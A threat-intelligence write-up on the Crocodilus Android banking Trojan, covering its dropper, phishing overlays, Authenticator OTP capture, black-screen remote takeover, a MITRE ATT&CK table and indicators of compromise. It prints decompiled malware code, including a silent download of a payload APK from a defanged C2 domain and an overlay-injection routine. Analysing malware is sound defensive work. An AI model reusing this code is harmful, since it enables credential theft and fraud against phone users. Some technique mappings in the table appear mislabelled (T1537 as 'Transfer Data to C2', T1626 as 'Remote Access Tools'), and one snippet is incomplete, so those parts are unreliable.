Crocodilus Android banking Trojan stole $2.8M via crypto wallet overlays & RAT hijacking, infecting 1,200+ devices. Mitigation steps inside

Continue reading
The discovery of Crocodilus is a sophisticated Android banking Trojan targeting financial institutions and cryptocurrency platforms. With Device-Takeover (DTO) capabilities, advanced evasion techniques, and psychological manipulation tactics, Crocodilus represents a significant escalation in mobile malware sophistication. This technical deep dive dissects its propagation, code-level mechanics, and defensive countermeasures.
Crocodilus employs a multi-stage dropper masquerading as legitimate apps (e.g., fake Chrome updates). Key evasion tactics include:
Code Snippet (Decompiled Dropper Logic): ```java public class MainActivity extends AppCompatActivity { void loadMaliciousModule() { String c2Url = "hxxps://quizzical[.]washbowl[.]calamity/module.apk"; DownloadManager.Request request = new DownloadManager.Request(Uri.parse(c2Url)); request.setNotificationVisibility(DownloadManager.Request.VISIBILITY_HIDDEN); // Triggers silent background download } } ```
Crocodilus dynamically renders phishing overlays using the `WindowManager` class. Overlays are fetched as PNG files from C2, with targeting logic for 50+ banks and crypto wallets (e.g., Binance, Trust Wallet).
Code Snippet (OverlayManager.java): ```java public void injectOverlay(String targetPackage) { View overlayView = // Load PNG from C2 WindowManager.LayoutParams params = new WindowManager.LayoutParams( LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT, TYPE_APPLICATION_OVERLAY, FLAG_NOT_TOUCH_MODAL | FLAG_NOT_FOCUSABLE, PixelFormat.TRANSLUCENT ); mWindowManager.addView(overlayView, params); // Injects overlay } ```
The Trojan’s `AccessibilityEventLogger` class captures all UI events, including Google Authenticator’s OTP codes. It extracts text from `TextView` elements with class names matching `com.google.android.apps.authenticator2`.
When the `TR2XAQSWDEFRGT` command is received, Crocodilus triggers a black overlay (`Color.BLACK`) and mutes the device using `AudioManager.setStreamMute()`.
| Tactic | Technique | Crocodilus Implementation |
|---|---|---|
| Execution | T1574: Hijack Execution Flow | Abuse of Accessibility Services |
| Credential Access | T1411: Input Capture | Accessibility Logger & keylogging |
| Defense Evasion | T1626: Remote Access Tools | Black screen overlays & sound muting |
| Exfiltration | T1537: Transfer Data to C2 | Encrypted exfiltration of OTP codes/SMS |
| Type | Value |
|---|---|
| SHA256 | c5e3edafdfda1ca0f0554802bbe32a8b09e8cc48161ed275b8fec6d74208171f |
| C2 Domain | quizzical[.]washbowl[.]calamity |
| IP | 185.156.73[.]42 (Bulletproof hosting, AS200019) |
Crocodilus exemplifies the convergence of psychological manipulation and technical sophistication in modern mobile malware. Its modular design, coupled with links to established threat actors, positions it as a persistent threat to global finance and cryptocurrency ecosystems. Proactive adoption of behavioral AI detection, zero-trust frameworks, and user education are critical to neutralizing its impact.

A single ClickFix infrastructure is pushing StealC, Amatera, Remus, NetSupport, CastleLoader and a new loader called ResiLoader through fake Google/Cloudflare checks.